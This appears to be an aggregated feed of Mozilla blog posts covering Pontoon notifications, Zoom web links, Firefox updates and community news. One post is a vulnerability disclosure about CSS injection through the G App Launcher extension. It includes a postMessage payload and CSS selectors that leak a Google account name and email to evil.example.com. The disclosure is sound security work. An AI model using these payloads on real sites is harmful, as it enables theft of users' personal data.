  • After 2 additional weeks, measure data about notifications (sent, read), recipients, how many of the recipients read at least 1 notification, and how many users were logged in (over the whole 4 weeks).
  BASELINE EXPERIMENT 1 EXPERIMENT 2
Observation period April 5-19 May 3-17 May 31 – June 14
Data collected on May 3 May 31 June 28
Sent 27043 12593 15383
Read 3172 1571 2198
Recipients 3072 2858 3370
Read 1+ 140 (4.56%) 125 (4.37%) 202 (5.99%)
Users logged in 517 459 446

Experiment 1

For the 1st experiment, we decided to promote the Pontoon Add-on. This add-on, among other things, allows users to read Pontoon notifications directly in the browser (even if Pontoon is not currently open), and receive a system notification when there are new messages to read.

Pontoon Add-on PromotionPontoon would detect if the add-on is already installed. If not, it would display an infobar suggesting to install the add-on. Users could also choose to dismiss the notification: while we didn’t track how many saw the banner, we know that 393 dismissed it over the entire quarter.

Unfortunately, this experiment didn’t seem to have an immediate positive impact on the number of users reading notifications (it actually decreased slightly). On the other hand, the number of active users of the add-on has been slowly but steadily increasing, so we hope that will have an impact in the long term.

Pontoon Add-on Statistics over last 90 daysThanks to Michal Stanke for creating the add-on in the first place, and helping us implement the necessary changes to make the infobar work in Pontoon. In the process, we also made this an “official” add-on on AMO, undergoing a review for each release.

Experiment 2

For the 2nd experiment, we made a slight change to the notifications icon within Pontoon, given that we always suspected that the existing one was not very intuitive. The original bell icon would change color from gray to red when new notifications are available, the new one would display the number of unread notifications as a badge over the icon — a popular UX pattern.

Pontoon NotificationThis seemed to have a positive impact on the number of users reading notifications, as the ratio of recipients reading notifications has increased by over 30%. Note that it’s hard to isolate the results of this experiment from the other work raising awareness around notifications (first experiment, blog posts, outreach, or even the survey).

Survey

Between May 26 and June 20, we ran a survey targeting users who were active in Pontoon within the last 2 years. In this context, “active” means that they submitted at least one translation over that period.

We received 169 complete responses, and these are the most significant points (you can find the complete results here).

On a positive note, the spread of the participants’ experience was surprisingly even: 34.3% have been on Pontoon for less than a year, 33.1% between 1 and 4 years, 32.5% for more than 4 years.

7% of participants claim that they don’t know what their role is in Pontoon. That’s significant, even more so if we account for participants who might have picked “translator” while they’re actually contributors (I translate, therefore I’m a translator). Clearly, we need to do some work to onboard new users and help them understand how roles work in Pontoon, or what’s the lifecycle of a suggestion.

53% of people don’t check Pontoon notifications. More importantly, almost 63% of these users — about 33% of all participants — didn’t know Pontoon had them in the first place! 19% feel like they don’t need notifications, which is not totally surprising: volunteers contribute when they can, not necessarily when there’s work to do. Here lies a significant problem though: notifications are used for more than just telling localizers “this project has new content to localize”. For example, we use notifications for commenting on specific errors in translations, to provide more background on a specific string or a project.

As for areas where to focus development, while most features were considered between 3 and 5 on a 1-5 importance scale, the highest rated items were:

  • Notifications for new strings should link to the group of strings added.
  • For translators and locale managers, get notifications when there are pending suggestions to review.
  • Add the ability to opt-out of specific notifications.

What’s next?

First of all, thanks to all the localizers who took the time to answer the survey, as this data really helps us. We’ll need to run it again in the future, after we do more changes, in particular to understand how the data evolves around notifications discoverability and awareness.

As an immediate change, given the results of experiment 2, we plan to keep the updated notification icon as the new default.

François MarierZoom WebRTC links

Most people connect to Zoom via a proprietary client which has been on the receiving end of a number of security and privacy issues over the past year, with some experts even describing it as malware.

It's not widely known however that Zoom offers a half-decent WebRTC client which means cross-platform one-click access to a Zoom room or webinar without needing to install any software.

Given a Zoom link such as https://companyname.zoom.us/j/123456789?pwd=letmein, you can use https://zoom.us/wc/join/123456789?pwd=letmein to connect in your browser.

Notice that the pool of Zoom room IDs is global and you can just drop the companyname from the URL.

In my experience however, Jitsi has much better performance than Zoom's WebRTC client. For instance, I've never been able to use Zoom successfully on a Raspberry Pi 4 (8GB), but Jitsi works quite well. If you have a say in the choice of conference platform, go with Jitsi instead.

Wladimir PalantHaving fun with CSS injection in a browser extension

Normally, CSS injection vulnerabilities are fairly boring. With some luck, you can use them to assist a clickjacking attack. That is, unless the vulnerable party is a browser extension, and it lets you inject CSS code into high profile properties such as Google’s. I’ve now had some fun playing with this scenario, courtesy of G App Launcher browser extension.

Website malicious.com injects CSS code via G App Launcher browser extension into google.com website. As a result, the malicious website displays the message: Your name is John Smith, john@example.com<figcaption> Image credits: Mozilla, G App Launcher </figcaption>

The vulnerability has been resolved in G App Launcher 23.6.1 on the same day as I reported it. Version 23.6.5 then added more changes to further reduce the attack surface. This was a top notch communication experience, many thanks to Carlos Jeurissen!

The issue

As so often, the issue here was a message event listener (something that browser vendors could address). In G App Launcher 23.6.0 it looked as follows (variable names reconstructed for clarity):

window.addEventListener("message", function (event) {
  if (event.data) {
    if ("hide" === event.data.newGbwaConfig) {
      overlay.classList.add("💙-hgbwa");
      if (button && isButtonVisible())
        button.click();
    }
    if ("launcheronly" === event.data.newGbwaConfig)
      overlay.classList.remove("💙-cgbwa");
    if (event.data.algClose)
      closeOverlay();
    if (event.data.algHeight)
      setHeight(event.data.algHeight);
  }
}, true);

This event handler would accept commands from any website. Most of these commands merely control visibility of the overlay without taking any data from the message into account. The only interesting command is algHeight. Looking at the setHeight() function, the relevant part is this:

var element = document.createElement("style");
element.textContent = ".💙-c {height:" + (height + 14) + "px !important;}";

If height here is a string, the arithmetical addition turns into string concatenation. So a value like 0}body{display:none}.dummy{ will inject arbitrary styles (here rendering the entire document invisible).

Last question before we turn to exploitation: where is this event handler active? The content script is injected for Google domains only. And there is an additional check in the code which is excluding some sites:

if (!(origin.startsWith("https://ogs.google.") ||
    origin.startsWith("https://accounts.google.") ||
    origin.startsWith("https://cello.client-channel.google."))) {

Google Accounts sign-in site is excluded, too bad. But all other Google properties can be exploited. There is one more check disabling this functionality on Safari, so it’s the only browser not affected.

Messing with the content

Most Google websites protect against clickjacking attacks by disallowing framing. This means that the attackers would have to open a Google website in a new tab. This also has the advantage of displaying a trusted address in the address bar.

Still, what’s the worst that could happen? The attackers will hide some parts of the content and rearrange others? This doesn’t sound like a big issue. But CSS can also modify the content displayed. Consider the following code for example:

document.body.onclick = () =>
{
  let wnd = window.open("https://www.google.com/search?q=google", "_blank");
  setInterval(() =>
  {
    wnd.postMessage({algHeight: `0;}
      h3::before
      {
        content: "Hacked!";
        font-size: 20px !important;
      }
      h3
      {
        font-size: 0 !important;
      }
      dummy{`}, "*");
  }, 0);
}

When the user clicks somewhere, this will open Google Search. The attacking page will immediately start posting a message to the G App Launcher extension, making it add some CSS code to the search page. And then the search results will look like that:

Google search result page for the search 'google' with the titles of all search results replaced by 'Hacked!'

This might be enough to convince somebody that Google has indeed been hacked. Similarly, attackers might for example display a Bitcoin scam, with an official Google domain lending it credibility.

Exfiltrating data

But that’s not the end of it. Google websites know a lot about you. For example, there is the following element:

<a class="…" aria-label="Google Account: Wladimir Palant (me@example.com)">

Using CSS only, it is possible to read out the value of this aria-label attribute. As far as I am aware, this attack has been first publicized by Eduardo Vela in 2008, he built his CSS Attribute Reader as proof-of-concept. Here the attacking website would inject the following CSS code into a Google page:

a[aria-label^="Google Account: a"]
{
  background-image: url("https://evil.example.com/?a");
}
a[aria-label^="Google Account: A"]
{
  background-image: url("https://evil.example.com/?A");
}



a[aria-label^="Google Account: W"]
{
  background-image: url("https://evil.example.com/?W");
}



a[aria-label^="Google Account: z"]
{
  background-image: url("https://evil.example.com/?z");
}
a[aria-label^="Google Account: Z"]
{
  background-image: url("https://evil.example.com/?Z");
}

The CSS code lists selectors for every possible first letter of the account name. For me, the selector a[aria-label^="Google Account: W"] will match the element and trigger a request to https://evil.example.com/?W. So the attacking website will learn that the first letter is W and send a new message to the page, injecting a new set of selectors:

a[aria-label^="Google Account: Wa"]
{
  background-image: url("https://evil.example.com/?Wa");
}
a[aria-label^="Google Account: WA"]
{
  background-image: url("https://evil.example.com/?WA");
}



a[aria-label^="Google Account: Wl"]
{
  background-image: url("https://evil.example.com/?Wl");
}



a[aria-label^="Google Account: Wz"]
{
  background-image: url("https://evil.example.com/?Wz");
}
a[aria-label^="Google Account: WZ"]
{
  background-image: url("https://evil.example.com/?WZ");
}

Now the selector a[aria-label^="Google Account: Wl"] will match the element and the website can start guessing the third letter. The process is repeated until the entire attribute value is known. That’s both my name and email address. And the attack is happening completely in the background while I am interacting with the page normally. There are no page reloads or anything else that would tip off users about the attack.

And that’s just an arbitrary Google website. A similar attack could be launched against Gmail for example to extract the names and email addresses of people you are communicating with. Given enough time, this attack could extract all your contacts.

How much time? With some optimizations: probably not too much. The main slowdown here is the request going out to a web server. That web server then has to communicate back to the attacking page so that it launches the next attack round. But modern browsers support Service Workers, a mechanism allowing to handle such requests in client-side JavaScript code. So a service worker could receive the background image request and notify the attacking page, all that without producing any network traffic whatsoever.

Timeline

  • 2021-06-01: Notified G App Launcher author about the vulnerability via support email address.
  • 2021-06-01: Received response that G App Launcher 23.6.1 has been released and is pending review by add-on stores.
  • 2021-06-03: Received notification that the update is live on all add-on stores but Microsoft Edge.
  • 2021-06-10: Received notification that G App Launcher 23.6.5 with further attack surface reduction is live on all add-on stores.
  • 2021-06-14: Agreed on 2021-06-28 as final disclosure date.

Mozilla Performance BlogPerformance Sheriff Newsletter (May 2021)

In May there were 198 alerts generated, resulting in 27 regression bugs being filed on average 4.5 days after the regressing change landed.

Welcome to the May 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by an update on our migration to browsertime as our primary tool for browser automation. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.5 days
  • 91% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 1.7 days
  • 100% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (May 2021)

In April we enabled automatic backfills for alerts for Linux and Windows. This means that whenever we generate an alert summary for these platforms, we now automatically trigger the affected tests against additional pushes. This is typically the first thing a sheriff will do when triaging an alert, and whilst it isn’t a time consuming task, the triggered jobs can take a while to run. By automating this, we increase the chance of our sheriffs having the additional context needed to identify the push that caused the alert at the time of triage.

If successful, automatic backfills should reduce the time between the alert being generated and the regression bug being opened. Whilst the results for May look promising, we have seen some fluctuation in this metric so I’ll hold off any celebrations for now.

Revisiting Browsertime

Back in November’s newsletter I shared our plans to finish migrating all of our page load tests away from our own web extension solution to the popular browsertime open source project. I’m happy to report that this was completed early in February, and has since been followed by migration of most of our benchmark tests to browsertime.

Raptor vs Browsertime by Month (May 2021)

Looking back, we saw our first alert from tests using browsertime in May 2020, so it’s somewhat neat to see that one year on we have now migrated all of our sheriffed tests, and May 2021 was the first month where we recorded no alerts from the web extension. We still have a few remaining tests to migrate before we can remove all the legacy code from our test harness, but I anticipate this happening sometime this year.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for May can be found here (for those with access).

Mozilla Addons BlogReview Articles on AMO and New Blog Name

I’m very happy to announce a new feature that we’ve released on AMO (addons.mozilla.org). It’s a series of posts that review some of the best add-ons we have available on AMO. So far we have published three articles:

Our goal with this new channel is to provide user-friendly guides into the add-ons world, focused on topics that are at the top of Firefox users’ minds. And, because we’re publishing directly on AMO, you can install the add-ons directly from the article pages.

Screenshot of article

A taste of the new look and feel

All add-ons that are featured in these articles have been reviewed and should be safe to use. If you have any feedback on these articles or the add-ons we’ve included in them, please let us know in the Discourse forum. I’ll be creating new threads for each article we publish.

New blog name

These posts are being published in a new section on AMO called “Firefox Add-on Reviews”. So, while we’re not calling it a “blog”, it could still cause some confusion with this blog.

In order to reduce confusion, we’ve decided to rename this blog from “Add-ons Blog” to “Add-ons Community Blog”, which we think better represents its charter and content. Nothing else will change: the URL will remain the same and this will continue to be the destination for add-on developer and add-on community news.

I hope you like the new content we’re making available for you. Please share it around and let us know what you think!

The post Review Articles on AMO and New Blog Name appeared first on Mozilla Add-ons Community Blog.

William LachanceMini-sabbatical and introducing Irydium

Approaching my 10-year moz-iversary in July, I’ve decided it’s time to take a bit of a mini-sabbatical: I’ll be out (and trying as hard as possible not to check bugmail) from Friday, June 25th until August 9th. During this time, I’ll be doing a batch at the Recurse Centre (something like a writer’s retreat for programmers), exploring some of my interests around data visualization and analysis that don’t quite fit into my role as a Data Engineer here at Mozilla.

In particular, I’m planning to work a bunch on a project tentatively called “Irydium”, which pursues some of the ideas I sketched out last year in my Iodide retrospective and a few more besides. I’ve been steadily working on it in my off hours, but it’s become clear that some of the things I want to pursue would benefit from more dedicated attention and the broader perspective that I’m hoping the Recurse community will be able to provide.

I had meant to write up a proper blog post to announce the project before I left, but it looks like I’m pretty much out of time. Instead, I’ll just offer up the examples on the newly-minted irydium.dev and invite people to contact me if any of the ideas on the site sounds interesting. I’m hoping to blog a whole bunch while I’m there, but probably not under the Mozilla tag. Feel free to add wrla.ch to your RSS feed if you want to follow what I’m up to!

Firefox NightlyThese Weeks in Firefox: Issue 96

Highlights

  • Improved dark mode support for macOS is now enabled in Nightly and Early Beta! When Firefox is in dark mode, look out for:
    • Dark Library/Page Info windows
      • The Library window on macOS, styled with the Dark Theme

        This is what the Library looks like with the lights off.

    • Dark tooltips
      • The Firefox tab strip with the mouse hovered over one tab. A dark tooltip says "Firefox Privacy Notice - Mozilla (pid 6752)"

        Dark tooltips, too!

    • Dark text selection colors in UI chrome
    • Dark autocomplete popups (login autofill, etc)
      • The autocomplete dropdown is shown below a form input. The dropdown is dark themed, and suggests the string "Mozilla" for a "Company" form field.

        These autocomplete dropdowns are getting dark, too!

    • Dark window styling, including dark stoplight buttons and the elimination of the dreaded white line at the top of dark windows
    • If you notice things that don’t look right, please file bugs blocking Bug 1623686.
  • Dimi landed password manager support for multi-page login forms! The password manager will now:
    • Detect username only forms
    • Support autofill, autocomplete, and context menu in these username only forms
    • Support login capture when users submit the multi-page form with the password

Friends of the Firefox team

For contributions from June 1 to June 15 2021, inclusive.

Introductions/Shout-Outs

Resolved bugs (excluding employees)

For contributions from June 1 to June 15  2021, inclusive.

Fixed more than one bug

  • Andrey Bienkowski
  • Ava Katushka
  • jha.ashray12
  • Kajal Sah
  • Michelle Goossens

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

  • Sonia Singla contributed a patch to remove the about:config preference “extensions.allowPrivateBrowsingByDefault” (it has been introduced as a fallback mechanism to return to the older behavior, during the transition to the user-controlled extension permission to selectively allow extensions to run in private windows) – Bug 1661517
  • As part of the work to support “Manifest Version 3 extensions”, an initial chunk of the work to expose the WebExtensions APIs to the extensions’ “background service worker” has been landed in Nightly 91 (locked behind a pref that can only be enabled in Nightly builds) – Bug 1682632
    • Bug 1682632 does not expose yet any actual extensions APIs to the background service workers, an initial set of APIs (browser.alarms, browser.runtime and browser.tests) are part of the follow up Bug 1688040
    • For an high level view of the plans related to “Manifest Version 3 extensions” support, follows the blogpost we recently published on the “Mozilla Add-ons Blog”: https://blog.mozilla.org/addons/2021/05/27/manifest-v3-update/

Downloads Panel

  • Outreachy intern, Ava, has landed the following:
    • A change where downloads opened with a computer application through the “What should Firefox do with this file?” prompt are directly saved to the Downloads folder (bug 1710933). This was already the behavior on macOS, and now Windows and Linux do this too if the browser.download.improvements_to_download_panel preference is set to true.
    • Test for basic functionality of downloads telemetry (bug 1712997)
  • In-progress:
    • Ava is working on making “Save to disk” the default decision for downloading files (bug 171094). She’s already written a patch. This change is also behind the browser.download.improvements_to_download_panel.
    • Ava has started investigating how frequently we should be opening the downloads panel (perhaps with an option to opt-out?) (bug 1709129)

macOS Spotlight

  • Work continues on native fullscreen support.
  • Work continues on reducing power consumption during video playback.
  • We’re looking into reports that Firefox is triggering memory pressure warnings, especially on M1 Macs.

New Tab Page

  • Upcoming (Firefox 90) Private Browsing New Tab Page experiment to promote Mozilla VPN with 3 different design variations bug 1715504

Nimbus / Experiments

  • Working on a wrapper API to allow cpp/platform clients to use the Nimbus API bug 1716560

NodeJS

  • In-tree Node 10 -> Node 12 upgrade expected to land today (Tuesday, June 15th)
    • This mailing list post has more details
    • Most developers shouldn’t need to do anything.
    • A followup post will be sent after the landing with details for the few folks who may wish to verify that everything is still working for them.

Password Manager

  • Tgiles landed an improved password generation experience by utilizing Apple’s password rules data! Bug 1686071
    • Now when users generate passwords on sites that have an entry in the “password-rules” dataset, we will generate a stronger and more accurate password based on site requirements!
    • Note: we currently do not have Apple’s password rules data pulled into Firefox so the improved password generation experience is not noticeable yet. The data should be pulled in within the next week or two.

Performance

  • Hang stats! Did you just add new code that runs on the main thread? Our BHR (Background Hang Reporter) system can help you detect if it’s causing hangs for our users in the wild. You can view the latest hang data here!
  • mconley landed patches to make it possible to control the about:home startup cache via Nimbus
    • The goal is to do a Nimbus experiment to see how the cache impacts user behaviour on Beta and (maybe) Release

Performance Tools

  • Screenshots are now visible while selecting a time range.
    • The Firefox Profiler UI shown in an animated GIF. The animation shows the cursor selecting a time range, and a smaller version of the collected screenshot for the slice of time being hovered is shown.

      One of our most powerful performance tools just got a bit better!

  • Profiler rust API for thread registration has been landed now. If you are working on a Rust project with multiple threads, don’t forget to register your threads with the Gecko Profiler. It’s pretty straightforward with gecko_profiler::register_thread and gecko_profiler::unregister_thread endpoints. More Rust API endpoints for the profiler coming soon!

Privacy/Security

Proton/MR1

Search and Navigation

  • Harry fixed a problem with a synced preference causing some address bar results to not appear anymore – Bug 1715484
  • Harry is doing some re-architecture work to split the old unified address bar provider into separate providers, that will give us better separation of concerns and control over results composition – Bug 1677126, Bug 1662167, Bug 1712352
  • Harry reduced the padding around search shortcut buttons in the address bar – Bug 1712775
  • Daisuke corrected cut text glyphs on address bar results – Bug 1565448
  • Daisuke fixed a problem with the focus ring briefly appearing on the address bar when clicking its border – Bug 1708263
  • Daisuke converted the separate search bar shortcut buttons to compact mode, like in the address bar – Bug 1709405
  • Drew is working on improvements to address bar results flexibility – Bug 1713322

Screenshots

Firefox Add-on ReviewsWatch videos with friends anywhere—how to social stream with browser extensions

If you’re missing the fun of watching movies and other entertainment with friends in real time, try a browser extension like Metastream Remote or Watch2gether to host private online watch parties. 

Metastream Remote

Install Metastream Remote and host a watch party within minutes. It works with most common video streaming sites like YouTube, Twitch, Vimeo, Dailymotion—even audio sites like SoundCloud. Subscription services such as Netflix, Hulu, and Disney+ work, too, though everyone in your watch party will need their own accounts on those platforms. 

Making things even easier is that only the host needs to install the Metastream extension. Once the host creates a watch party the extension produces a shareable link, so guests simply click to a location and presto—everyone’s screen is synced to the host and the group communicates via chat. 

Watch parties are private by default, but you can create public events. There’s no cap on the number of guests you can invite, but sync performance may degrade if the party gets into the many dozens of people. 

Metastream can also queue media, so if you’re watching short clips or music videos it’s easy to line up your content so the party seamlessly flows from one piece to the next.

Watch2gether

Watch2gether is a popular web-based social streaming platform that doesn’t require a browser extension, but using the Watch2gether extension in concert with the website offers a few additional features:

  • Ability to social stream content that’s not directly supported by the Watch2gether website (e.g. the video source doesn’t offer an embeddable version) 
  • Ability to social stream content that is supported by Watch2gether but the specific video you want to watch is, for whatever reason, restricted
  • Easy access to your watch rooms

Watch2gether supports a huge array of popular streaming sites—all the ones you’d expect like YouTube, Vimeo, Twitch, etc.—but also some that might surprise like TikTok and Instagram. There’s even a livestream mode if you want to make yourself the star of the show. 

The big paid platforms like Netflix, Amazon, and Disney+ may be accessed with Watch2gether, but as with Metastream Remote, all watch party members will need their own respective accounts on those services.

Transform your media experience

Take your watch party to the next level with additional browser extensions… 

Enhancer for YouTube

Gobs of features and enhancements to completely alter and improve the way you enjoy YouTube. 

While dozens of customization options may seem like an overwhelming number of choices, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration
<figcaption>Enhancer for YouTube offers easy access controls just beneath the video player.</figcaption>

Turn Off the Lights

This lightweight extension gives you simple, one-click access to Theater mode for any video site. Just hit Turn Off the Light‘s toolbar button and everything around the video player fades to dark so you can focus solely on your video content. 

Key features… 

  • Set default video quality from low to high def
  • Widescreen mode
  • Subtle visual tweaks like custom colors and opacity setting
  • Mouse-wheel controls

Audio Equalizer

Sound quality is a huge part of your video experience, and obviously so if your watch party is more of a listening party with music videos or SoundCloud streams. The Audio Equalizer extension puts powerful audio enhancement features right into your browser. 

Adjust balance levels, EQ, and other key audio elements right from the extension’s handy pop-up controls. For music specifically, there’s a drop-down menu that lets you select the genre you’re listening to—rock, reggae, dance, etc.—so your stream is optimized per style. You can even save your own custom EQ settings should you want to dial in the audio to your own ear. 

<figcaption>Audio Equalizer gives you a range of sound controls right from its toolbar button.</figcaption>

We hope your next watch party is a smashing success! Find more media enhancing extensions on addons.mozilla.org.

Mozilla Reps CommunityCelebrating 10 years of Reps

Last week the Reps program celebrated its 10 years anniversary. To honor the event, a week of celebrations took place, with meetings in Zoom rooms and virtual hangouts in specially decorated Hubs rooms. During that week, current Reps and Reps alumni shared memories of the past years, talked about their current work, and discussed future plans and aspirations.

The Reps program was created with a simple narrative in the mind of its founders (William Quiviger and Pierros Papadeas), to bring structure to the regional communities and help them grow. Throughout the last years, the Reps have served their communities, by growing them and mentoring them, supporting all Mozilla’s big projects and launches, and pivoting to be able to help where the organization needed them the most. From the 1 million Mozillians initiative to the Firefox OS days, and from the Quantum launch to the recent foxfoooding campaign, Reps have always stepped up for the challenge, giving a helping hand, organizing thousands of events, and amplifying Mozilla’s work and mission. And is that spirit that we wanted to celebrate during the last week. A spirit of giving and helping.

 

The event

Due to the pandemic, an event with physical attendance was not possible. However, that didn’t discourage the Reps. A full-week virtual event was organized instead (special kudos to Francesca Minelli for all the work on planning and coordinating it) that included virtual talks in Zoom rooms and hanging out time to two Hubs rooms. There was a dedicated Reps room and a room for communities. The first day we kicked off with a trip down memory lane. Reps alumni and longtime Reps were invited to talk about their experiences during the first days of the program. The day closed with a talk and Q&A with Mitchell Baker about the significance of the Reps program and how Reps can contribute to the future of Mozilla. The second day was dedicated to the current state of the program, where Reps had a chance to chat with the Reps council and its current work. The last 2 days were dedicated to the current work of Reps and how it is affecting the rest of the organization with talks from both staff and also volunteers presenting their communities. During the last days, we also focused on how Reps can improve, gathered feedback and suggestions for the future of the program.

Long time Reps and Reps alumni

Long time Reps and Reps alumni

Hanging out at the Hubs room

And what about the future?

 

For the future we are focusing on 2 main pillars: 1) improving the mentorship program, so Reps can feel more supported and be able to do more 2) work more on how we can bring volunteers to product work. The last part is already happening via the campaigns. We want to work more on how we can bring volunteers earlier on product experience and ideation and nevertheless, spreading the word. A busy future is ahead for the Reps but we are ready for it. Reps onwards!

Karl DubostToday is my Mozilla 8 years anniversary

Eight years ago, I have started working at Mozilla.

Archer on a stone wall decoration.

Hiring, a long process

In my employment history, I have never tried to spread a large net to try to land a job, except probably for my first real job in 1995. I have always carefully chosen the company I wanted to work for. I probably applied ten times on the course of 10 years before landing a job at Mozilla.

When the Web Compatibility team was created, I applied to one of the positions available in 2013. In April 2013, from Montreal, I flew to Mountain View for a series of job interviews with different Mozilla employees. Most of the interviews were interesting but I remember one engineer was apparently not happy interviewing me and it didn't go very well. I don't remember who, but it left me with a bitter taste at the time. A couple of days later I was notified that I was not taken for the job. While disappointing, I was not surprised. I usually do not perform well during interviews, specifically when you have to demonstrate knowledge instead of articulating the way you work with knowledge. I find interviews a kind of theater.

But Mozilla came back to me and proposed me a 6 months contract, still in the Mozilla Web Compatibility team but for another role. It was not what I was initially interested by, but why not? It's when I met Lawrence Mandel, who would be my future manager if I landed the job. I liked the contact right away. I got an offer in June 2013. I signed.

Fast forward 8 years, I'm currently the manager of the Web Compatibility team.

Without people, no Web Compatibility!

The Web Compatibility team started with 3 persons: Mike Taylor, Hallvord R. M. Steen and myself and at its peak we were probably 10 persons, depending on how we count. We are currently 7 persons including myself. Talking about my 8 years anniversary doesn't make sense without mentioning the work of the team. My work is insignificant if we don't take the globability of what the team is achieving.

Figures on a stone wall decoration.

« Et par contre, si je communique à mes hommes l’amour de la marche sur la mer, et que chacun d’eux soit ainsi en pente à cause d’un poids dans le cœur, alors tu les verras bientôt se diversifier selon leurs mille qualités particulières. Celui-là tissera des toiles, l’autre dans la forêt par l’éclair de sa hache couchera l’arbre. L’autre, encore, forgera des clous, et il en sera quelque part qui observeront les étoiles afin d’apprendre à gouverner. Et tous cependant ne seront qu’un. Créer le navire ce n’est point tisser les toiles, forger les clous, lire les astres, mais bien donner le goût de la mer qui est un, et à la lumière duquel il n’est plus rien qui soit contradictoire mais communauté dans l’amour. »

Antoine de Saint-Exupéry. « Citadelle. »

Since the beginning of 2021,

Dennis has drastically reduced the number of old diagnosis that were on top (or at the bottom?) of our pile. He is also now the module owner for Site Interventions, which help Mozilla to hotfix websites. When a site is broken and the outreach is unlikely to be unsuccessful, this one of the ways we have to fix the website on the fly so the people can continue to enjoy using troubled websites.

James is the mind and the smooth operator behind Web Platform Tests at Mozilla. He is doing an amazing job at encouraging Mozilla engineers to develop more Web Platform tests. He makes sure that everything is synchronized with other vendors. Web Platform Tests are essential to be able to discover bugs in specifications and differences in implementations. He is also the core person for the work on BiDi at Mozilla. BiDi is another important part of the puzzle of Web Compatibility. Testing manually websites is costly. Webdriver comes here to make it possible for automating the tests of websites functionalities. If the cost is lower, web developers can test their websites in more than one browser and discover and fix their webcompatibility issues before we discover them.

Ksenia is the owner of webcompat.com and webcompat ML bot. The ML bot helps us to pre-filter the bug and determine if it's a valid webcompat issue. We receive around 700 and 800 bugs a week and that's a lot for our small team. We would not be able to manage without the bot. Tiredlessly she has improved the tools used for minimizing the boring part of the work we do and at the same time, found solutions for helping bug reporters to have a better experience.

Softvision team: Oana and Raul. I have a lot of respect for the people at Softvision helping Mozilla to do the triage of bugs. This task is sisyphean. Every week, 700 to 800 bugs come in. Luckily enough we have a bot for pre-triage, but when bugs are evaluated being valid. They decipher the old runes of bug reports to understand what the bug reporter suffered and they make it something more compelling for people who will be diagnosing. Previously, we had Ciprian and Sergiu.

Thomas is the architect of the Site Interventions. He is also making sure that sites continue to work when tracking protection is blocking things. He has implemented lately SmartBlock. Thomas is this giant person who can touch everything in the Webcompat team, but still super caregiver when we do not understand something. He explains what he does and this is gold. It means that people can grow, evolve and be a better part of themselves.

Contributors And Interns

The project would be nothing without the contributors and interns who worked with us on making the site, the tools, the process better:

Abdul, Alexa, Beatriz, Carol, Deepthi, Guillaume, Kate, Mariana, mesha, Reinhart, and more…

Those Who Were

And there are those who have been in the webcompat team and have been participants to its success: Mike, Adam, Eric, Hallvord, Ola. I could write a lot more about it.

« En ce qui concerne donc mon voisin, j’ai observé qu’il n’était point fertile d’examiner de son empire les faits, les états de choses, les institutions, les objets, mais exclusivement les pentes. Car si tu examines mon empire tu t’en iras voir les forgerons et les trouveras forgeant des clous et se passionnant pour les clous et te chantant les cantiques de la clouterie. Puis tu t’en iras voir les bûcherons et tu les trouveras abattant des arbres et se passionnant pour l’abattage d’arbres, et se remplissant d’une intense jubilation à l’heure de la fête du bûcheron, qui est du premier craquement, lorsque la majesté de l’arbre commence de se prosterner. Et si tu vas voir les astronomes, tu les verras se passionnant pour les étoiles et n’écoutant plus que leur silence. Et en effet chacun s’imagine être tel. Maintenant si je te demande : « Que se passe-t-il dans mon empire, que naîtra-t-il demain chez moi ? » tu me diras : « On forgera des clous, on abattra des arbres, on observera les étoiles et il y aura donc des réserves de clous, des réserves de bois et des observations d’étoiles. » Car myope et le nez contre, tu n’as point[…] »

Antoine de Saint-Exupéry. « Citadelle. »

Challenging The Comfort Of My Current Position

When working long enough at a company that you like, it becomes easy to feel comfortable. So every couple of years, I put myself in the position of looking for another job, even eventually having job interviews with some companies. I try to limit these interviews to the strict necessary by carefully selecting the companies I apply to.

I want to be in a position where I have to choose in between staying at Mozilla and discovering a new area with interesting people and interesting areas of work. Sometimes areas that I have probably poor knowledge of. This is slightly tricky because many companies have a tendency to recruit people ready to fit in the machinery instead of people with an ability to work and learn.

So far I have been 8 years at Mozilla, but I want to continue to make Mozilla a choice to stay instead of a place which is comfortable. So I will continue to explore new opportunities as I have always done.

Comments

If you have more questions, things I may have missed, different take on them. Feel free to comment…. Be mindful.

Otsukare!

Niko MatsakisCTCFT Social Hour

Hey everyone! At the CTCFT meeting this Monday (2021-06-21), we’re going to try a “social hour”. The idea is really simple: for the hour after the meeting, we will create breakout rooms in Zoom with different themes. You can join any breakout room you like and hangout.

The themes for the breakout rooms will be based on suggestions. If you have an idea for a room you’d like to try, you can post it in a dedicated topic on the #ctcft Zulip stream. Or, if you see somebody else has posted an idea that you like, then add a 👍 emoji. We’ll create the final breakout list based on what we see there.

The breakout rooms can be as casual or focused as you like. For example, we will have some default rooms for hanging out – please make suggestons for icebreaker topics on Zulip! We also plan to have some rooms where people are chatting while doing Rust work: for example, yaahc suggested for folks who want to write mentoring instructions.

Also: a reminder that there is a CTCFT Calendar that you can subscribe to to be reminded of future meetings. If you like, I can add you to the invite, just ask on Zulip or Discord.

See you there!

Firefox Add-on ReviewsWhat’s the best ad blocker for you?

So you’ve decided to do something about all those annoying ads you’re barraged with online. What pushed you over the edge? Auto-play video ads? Blaring banners? Tired of your music interrupted by a sudden sponsorship? Was it the realization they intentionally make the ‘Close’ buttons [x] on ads super tiny so you accidentally click the very thing you’re trying to avoid? 

There are a number of approaches you can take to blocking ads with a browser extension—it just depends on what you’re trying to achieve. Here are some of the best ad blockers based on different goals…

I just want an awesome, all-purpose ad blocker.

Keep in mind a benefit of any decent ad blocker is that you should experience a faster web, since fewer ads means there’s less content for your browser to load. It’s a win-win: ditch awful ads while speeding up your experience. 

